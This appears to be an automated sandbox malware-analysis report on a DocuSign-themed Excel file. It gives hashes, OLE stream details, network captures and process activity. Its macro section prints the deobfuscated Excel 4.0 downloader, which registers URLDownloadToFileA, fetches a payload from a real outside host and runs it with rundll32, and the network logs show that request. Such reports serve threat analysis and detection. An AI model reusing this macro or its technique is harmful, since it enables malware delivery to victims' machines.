              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):185
              Entropy (8bit):4.833884412063983
              Encrypted:false
              SSDEEP:3:oyBVomM0bcsoMW/SWCuscbcsoMW/SWCmM0bcsoMW/SWCv:dj60wsoMWKW7wsoMWKWU0wsoMWKWs
              MD5:8008051768264A8F63462178EE0A3809
              SHA1:2FA73992D0C2D6C872FF64374034E841D3BB0CAA
              SHA-256:57612946322F859DBB4A3CEF93B041BA8F62C0BC4252DB26A95F8EE72A64CF32
              SHA-512:F054CBE1CA26C4C63742A29E28FF8D183349875863887E2EEEA4EEF42191F29F5B36DEAD52CB394524A97FD3E56D0172D7EF27F44807B19206B5A666C4D988AB
              Malicious:false
              Reputation:low
              Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.27303.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.27303.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.27303.LNK=0..
              C:\Users\user\Desktop\4FCE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Applesoft BASIC program data, first line number 16
              Category:dropped
              Size (bytes):177025
              Entropy (8bit):7.239939186555363
              Encrypted:false
              SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qn8:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKo
              MD5:55BB2085B17B24C9047A18CAB0FEDBAB
              SHA1:CE0E5D44B46F4517000E492D307E49280220CFEA
              SHA-256:16A11EE385E26D296DA33E0D46AB9D4F18C9DE51088D8D14B9A13D8C0913A603
              SHA-512:2C2EA2C4952C74726EE9304AE9719F7858A888FE6CE9F45A619033C09CB36DCEDAB00B9091A43858316C85BEC7A8CD5BB70C689CCD282BB4C19831998CE89EB7
              Malicious:false
              Reputation:low
              Preview: ........g2.........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

              Static File Info

              General

              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
              Entropy (8bit):7.195176543915214
              TrID:
              • Microsoft Excel sheet (30009/1) 78.94%
              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
              File name:SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls
              File size:168960
              MD5:ad9550ee6ece8322501ed92d374d3928
              SHA1:d0617e5cb90b4db4fcf2269ffd8228b9ca4f89af
              SHA256:74423c8236cd5057af8e4ffbf84fdcbb34f5e6dc8f8dc0520c685c7fd6bc100a
              SHA512:531ab2de644449e17e4f6d4a708f98a89bd6ac972b0bc6ed6b725205e5a0412ef6b0dfa9bdb422f6732c5396b8d0c82783c88c3727496488c71cb960b25d2f0b
              SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMj:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK+
              File Content Preview:........................>.......................H...........................E...F...G..........................................................................................................................................................................

              File Icon

              Icon Hash:e4eea286a4b4bcb4

              Static OLE Info

              General

              Document Type:OLE
              Number of OLE Files:1

              OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls"

              Indicators

              Has Summary Info:True
              Application Name:Microsoft Excel
              Encrypted Document:False
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:True
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:True

              Summary

              Code Page:1251
              Author:
              Last Saved By:
              Create Time:2006-09-16 00:00:00
              Last Saved Time:2021-02-19 10:48:36
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Document Code Page:1251
              Thumbnail Scaling Desired:False
              Contains Dirty Links:False
              Shared Document:False
              Changed Hyperlinks:False
              Application Version:917504

              Streams

              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
              General
              Stream Path:\x5DocumentSummaryInformation
              File Type:data
              Stream Size:4096
              Entropy:0.357299206868
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00
              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
              General
              Stream Path:\x5SummaryInformation
              File Type:data
              Stream Size:4096
              Entropy:0.247217286775
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
              General
              Stream Path:Workbook
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:157800
              Entropy:7.46869820242
              Base64 Encoded:True
              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

              Macro 4.0 Code

              ,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
              "=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Feb 20, 2021 02:07:00.020901918 CET4916780192.168.2.22185.81.0.78
              Feb 20, 2021 02:07:00.079477072 CET8049167185.81.0.78192.168.2.22
              Feb 20, 2021 02:07:00.079619884 CET4916780192.168.2.22185.81.0.78
              Feb 20, 2021 02:07:00.080370903 CET4916780192.168.2.22185.81.0.78
              Feb 20, 2021 02:07:00.139641047 CET8049167185.81.0.78192.168.2.22
              Feb 20, 2021 02:07:27.539189100 CET8049167185.81.0.78192.168.2.22
              Feb 20, 2021 02:07:27.539448023 CET4916780192.168.2.22185.81.0.78
              Feb 20, 2021 02:07:27.539774895 CET4916780192.168.2.22185.81.0.78
              Feb 20, 2021 02:07:27.597940922 CET8049167185.81.0.78192.168.2.22

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Feb 20, 2021 02:06:59.939125061 CET5219753192.168.2.228.8.8.8
              Feb 20, 2021 02:06:59.996273041 CET53521978.8.8.8192.168.2.22

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Feb 20, 2021 02:06:59.939125061 CET192.168.2.228.8.8.80x71ddStandard query (0)www.chipmania.itA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Feb 20, 2021 02:06:59.996273041 CET8.8.8.8192.168.2.220x71ddNo error (0)www.chipmania.itchipmania.itCNAME (Canonical name)IN (0x0001)
              Feb 20, 2021 02:06:59.996273041 CET8.8.8.8192.168.2.220x71ddNo error (0)chipmania.it185.81.0.78A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • www.chipmania.it

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.2249167185.81.0.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              TimestampkBytes transferredDirectionData
              Feb 20, 2021 02:07:00.080370903 CET0OUTGET /mails/open.php HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: www.chipmania.it
              Connection: Keep-Alive


              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:02:06:35
              Start date:20/02/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13fd60000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:02:07:06
              Start date:20/02/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
              Imagebase:0xffb60000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >